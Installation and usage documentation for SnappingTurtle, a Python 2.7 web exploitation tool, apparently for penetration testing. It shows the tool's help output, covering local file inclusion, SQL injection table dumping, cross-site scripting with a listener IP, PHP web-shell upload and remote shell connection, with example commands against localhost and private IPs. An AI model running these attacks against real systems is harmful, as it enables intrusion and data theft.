SnappingTurtle has only one requirement: Python 2.7. Other versions may work, but are not officially supported. If Python isn't already installed, the official releases can be found on python.org.
Once Python is installed, SnappingTurtle can be downloaded and run.
SnappingTurtle was designed to be entirely portable, with no explicit setup. To install it, download the latest version from GitHub. Once the latest archive has been downloaded, extract st.py to the preferred installation directory. For this documentation, st.py was extracted to c:\tools on a Windows 10 machine.
Once Python 2.7 has been installed and st.py extracted, SnappingTurtle can be run.
SnappingTurtle can be run with a command like the following:
C:\tools>python st.py
When run without command-line arguments, SnappingTurtle displays an overview of its settings.
The output should look something like the sample below.
    C:\tools>python st.py
    SnappingTurtle Web Exploitation Tool 0.1.0324.1445
    http://autosectools.com/SnappingTurtle

    python st.py [exploitation strategy] [url] [inputs]

    # Exploitation Strategies
    lfi                 Local file inclusion. Injection is performed using the $lfi token.
    sqli {options}      SQL injection. Injection is performed using the $sqli token.
                        If used, one of two options must be specified:
                            list            Dumps a list of databases and tables.
                            table {name}    Dumps a database table.
    xss {server ip}     Cross-site scripting. Injection is performed using the $xss token.
                        If used, a target accessible server IP must be specified for listening.
    upload              Arbitrary upload. Write data to the server using the -f option.
                        If used, at least one file must be specified using the -f option.
                        Built-in shells can be injected using the $php token.
    shell {shell url}   Connects to a previously created shell.

    # Url
    The url to exploit. Can be injected into using tokens.

    # Inputs
    -g {GET name} {GET value}           GET data in key/value format.
    -p {POST name} {POST value}         POST data in key/value format.
    --g {GET data}                      GET data in Python map format.
    --p {POST data}                     POST data in Python map format.
    -f {name} {filename} {file data}    POST data as a file.

    # Examples
    python st.py lfi http://localhost/lfiTest.php?theme=$lfi
    python st.py lfi http://localhost/lfiTest.php -g theme $lfi
    python st.py lfi http://localhost/lfiTest.php?theme=$lfi%00
    python st.py lfi http://localhost/postTest.php --p "{'theme':'$lfi'}"
    python st.py sqli list http://localhost/sqliTest.php -g email $sqli
    python st.py sqli table sqlitest.users http://localhost/sqliTest.php -g email $sqli
    python st.py xss 10.0.0.122 http://10.0.0.145/xss.php -g search $xss
    python st.py upload http://10.0.0.145/upload.php -f file shell.php $php
    python st.py shell http://10.0.0.145/shell.php
Now it is time to exploit a target. Head over to Local File Inclusion To Remote Code Execution